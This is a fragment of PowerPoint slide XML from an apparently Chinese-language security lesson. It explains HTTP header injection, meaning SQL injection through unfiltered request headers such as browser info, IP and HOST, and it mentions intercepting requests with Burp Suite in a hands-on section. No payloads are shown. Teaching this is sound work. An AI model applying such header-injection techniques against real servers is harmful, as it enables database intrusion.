                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76624849-AF7E-634B-99A3-F3675B77261C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490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091B5BBA-4A75-584E-9212-6E8E0BBEF5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5664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D499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600"/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D7E02227-3662-944D-9C73-BC9B060053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8250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 0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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D4999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600" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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626A29F-90EF-2F45-AC22-0DBA4EC90C74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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875991E-6CB3-6A45-A8B5-CEA7DA3A768C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385208" y="2156346"/>
            <a:ext cx="860063" cy="12298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0856818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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B252FF-74BF-E647-8A3E-5E6F88C8AD9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2171224" y="1775964"/>
            <a:ext cx="7849552" cy="3598229"/>
            <a:chOff x="2231535" y="1775964"/>
            <a:chExt cx="7849552" cy="3598229"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3104446" y="1775964"/>
              <a:ext cx="6976641" cy="35982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800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>头注入是什么？</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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	</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pP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针对</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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HTTP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的请求头，如果不加以过滤或者转义，在直接与数据库交互的过程中容易被利用进行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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SQL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注入攻击，即</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN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HTTP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头注入。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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常见场景：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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访问</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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Web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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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Server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时，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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Web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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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Server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会从</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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HTTP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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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Header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中取出浏览器信息、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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IP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地址、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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HOST</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>信息等存储到数据库中。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33322F89-AD3E-D24F-89E7-801DF9518D09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2231535" y="1923574"/>
              <a:ext cx="433767" cy="433767"/>
              <a:chOff x="1902319" y="1507871"/>
              <a:chExt cx="938512" cy="938512"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="6" name="Group 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA563178-EDDA-9349-83A2-3C55C6963C29}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2136408" y="1764045"/>
                <a:ext cx="470334" cy="426157"/>
                <a:chOff x="6448425" y="796925"/>
                <a:chExt cx="287338" cy="260350"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="25" name="Freeform 3562">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507BA0A5-A363-C341-87D5-9585630C80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48425" y="796925"/>
                  <a:ext cx="277812" cy="161925"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 701"/>
                    <a:gd name="T1" fmla="*/ 285 h 408"/>
                    <a:gd name="T2" fmla="*/ 5 w 701"/>
                    <a:gd name="T3" fmla="*/ 288 h 408"/>
                    <a:gd name="T4" fmla="*/ 2 w 701"/>
                    <a:gd name="T5" fmla="*/ 290 h 408"/>
                    <a:gd name="T6" fmla="*/ 1 w 701"/>
                    <a:gd name="T7" fmla="*/ 293 h 408"/>
                    <a:gd name="T8" fmla="*/ 0 w 701"/>
                    <a:gd name="T9" fmla="*/ 297 h 408"/>
                    <a:gd name="T10" fmla="*/ 1 w 701"/>
                    <a:gd name="T11" fmla="*/ 300 h 408"/>
                    <a:gd name="T12" fmla="*/ 2 w 701"/>
                    <a:gd name="T13" fmla="*/ 303 h 408"/>
                    <a:gd name="T14" fmla="*/ 5 w 701"/>
                    <a:gd name="T15" fmla="*/ 306 h 408"/>
                    <a:gd name="T16" fmla="*/ 8 w 701"/>
                    <a:gd name="T17" fmla="*/ 308 h 408"/>
                    <a:gd name="T18" fmla="*/ 259 w 701"/>
                    <a:gd name="T19" fmla="*/ 408 h 408"/>
                    <a:gd name="T20" fmla="*/ 701 w 701"/>
                    <a:gd name="T21" fmla="*/ 0 h 408"/>
                    <a:gd name="T22" fmla="*/ 8 w 701"/>
                    <a:gd name="T23" fmla="*/ 285 h 4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01" h="408">
                      <a:moveTo>
                        <a:pt x="8" y="285"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="297"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="300"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="303"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="308"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="259" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="701" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="285"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:grp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accent5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26" name="Freeform 3563">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC6DEF8-3FB5-FB4A-8435-47773DFB31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54788" y="800100"/>
                  <a:ext cx="180975" cy="257175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 456"/>
                    <a:gd name="T1" fmla="*/ 424 h 646"/>
                    <a:gd name="T2" fmla="*/ 0 w 456"/>
                    <a:gd name="T3" fmla="*/ 635 h 646"/>
                    <a:gd name="T4" fmla="*/ 0 w 456"/>
                    <a:gd name="T5" fmla="*/ 639 h 646"/>
                    <a:gd name="T6" fmla="*/ 3 w 456"/>
                    <a:gd name="T7" fmla="*/ 642 h 646"/>
                    <a:gd name="T8" fmla="*/ 5 w 456"/>
                    <a:gd name="T9" fmla="*/ 645 h 646"/>
                    <a:gd name="T10" fmla="*/ 9 w 456"/>
                    <a:gd name="T11" fmla="*/ 646 h 646"/>
                    <a:gd name="T12" fmla="*/ 11 w 456"/>
                    <a:gd name="T13" fmla="*/ 646 h 646"/>
                    <a:gd name="T14" fmla="*/ 12 w 456"/>
                    <a:gd name="T15" fmla="*/ 646 h 646"/>
                    <a:gd name="T16" fmla="*/ 16 w 456"/>
                    <a:gd name="T17" fmla="*/ 646 h 646"/>
                    <a:gd name="T18" fmla="*/ 18 w 456"/>
                    <a:gd name="T19" fmla="*/ 645 h 646"/>
                    <a:gd name="T20" fmla="*/ 21 w 456"/>
                    <a:gd name="T21" fmla="*/ 644 h 646"/>
                    <a:gd name="T22" fmla="*/ 22 w 456"/>
                    <a:gd name="T23" fmla="*/ 641 h 646"/>
                    <a:gd name="T24" fmla="*/ 126 w 456"/>
                    <a:gd name="T25" fmla="*/ 469 h 646"/>
                    <a:gd name="T26" fmla="*/ 315 w 456"/>
                    <a:gd name="T27" fmla="*/ 569 h 646"/>
                    <a:gd name="T28" fmla="*/ 317 w 456"/>
                    <a:gd name="T29" fmla="*/ 570 h 646"/>
                    <a:gd name="T30" fmla="*/ 320 w 456"/>
                    <a:gd name="T31" fmla="*/ 572 h 646"/>
                    <a:gd name="T32" fmla="*/ 323 w 456"/>
                    <a:gd name="T33" fmla="*/ 570 h 646"/>
                    <a:gd name="T34" fmla="*/ 325 w 456"/>
                    <a:gd name="T35" fmla="*/ 570 h 646"/>
                    <a:gd name="T36" fmla="*/ 329 w 456"/>
                    <a:gd name="T37" fmla="*/ 567 h 646"/>
                    <a:gd name="T38" fmla="*/ 332 w 456"/>
                    <a:gd name="T39" fmla="*/ 561 h 646"/>
                    <a:gd name="T40" fmla="*/ 456 w 456"/>
                    <a:gd name="T41" fmla="*/ 0 h 646"/>
                    <a:gd name="T42" fmla="*/ 0 w 456"/>
                    <a:gd name="T43" fmla="*/ 424 h 6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56" h="646">
                      <a:moveTo>
                        <a:pt x="0" y="424"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="639"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="642"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="645"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="645"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="644"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="641"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="469"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="315" y="569"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="317" y="570"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="572"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="323" y="570"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="570"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="329" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="332" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="456" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="424"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:grpFill/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accent5"/>
                    </a:solidFill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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Oval 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5A3423-4632-4B4E-815B-3EDCA27E38AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1902319" y="1507871"/>
                <a:ext cx="938512" cy="938512"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="1D49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8C23BC1-A326-064A-92FE-C8B0FD431769}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="5283976" flipH="1">
              <a:off x="2284519" y="2946095"/>
              <a:ext cx="379412" cy="381000"/>
              <a:chOff x="3552" y="960"/>
              <a:chExt cx="215" cy="182"/>
            </a:xfrm>
          </p:grpSpPr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CFA5EEC6-B242-C14A-B35F-5A14F89779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48" y="960"/>
                <a:ext cx="119" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 212 w 262"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 261 w 262"/>
                  <a:gd name="T3" fmla="*/ 316 h 375"/>
                  <a:gd name="T4" fmla="*/ 0 w 262"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 212 w 262"/>
                  <a:gd name="T7" fmla="*/ 374 h 37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62"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 262 w 262"/>
                  <a:gd name="T15" fmla="*/ 375 h 37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62" h="375">
                    <a:moveTo>
                      <a:pt x="212" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="261" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr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id="{20FEA43C-0851-7845-A28F-CDA60BF167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52" y="960"/>
                <a:ext cx="194" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 426"/>
                  <a:gd name="T1" fmla="*/ 374 h 375"/>
                  <a:gd name="T2" fmla="*/ 425 w 426"/>
                  <a:gd name="T3" fmla="*/ 374 h 375"/>
                  <a:gd name="T4" fmla="*/ 213 w 426"/>
                  <a:gd name="T5" fmla="*/ 0 h 375"/>
                  <a:gd name="T6" fmla="*/ 0 w 426"/>
                  <a:gd name="T7" fmla="*/ 374 h 375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426"/>
                  <a:gd name="T13" fmla="*/ 0 h 375"/>
                  <a:gd name="T14" fmla="*/ 426 w 426"/>
                  <a:gd name="T15" fmla="*/ 375 h 375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426" h="375">
                    <a:moveTo>
                      <a:pt x="0" y="374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="425" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="374"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="764700"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="F2BF5A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>
                  <a:latin typeface="Calibri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48575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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937614EE-A352-4340-A1A7-4A377C51F8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0943" y="1737594"/>
            <a:ext cx="9370114" cy="399804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871AABA3-411B-F645-A36E-0EC4E9CD9B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3714" y="5376576"/>
            <a:ext cx="817995" cy="364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6922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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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97325A2B-41EA-6447-972B-3FE9782509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0414" y="2409545"/>
            <a:ext cx="7830724" cy="264014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923B1E3-3655-BE46-A7BB-112AED222B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4679720" y="1581288"/>
            <a:ext cx="3129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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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抓包拦截请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075247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8EA63DA-2AEA-8F40-B1AA-FE830C782EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="3602111"/>
            <a:ext cx="4401431" cy="695848"/>
            <a:chOff x="1238250" y="3349464"/>
            <a:chExt cx="4584134" cy="724733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879CBAAF-099F-B447-9374-3EB4085EF4C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670301"/>
              <a:ext cx="4584134" cy="403896"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:sp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zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>01 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>认识</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
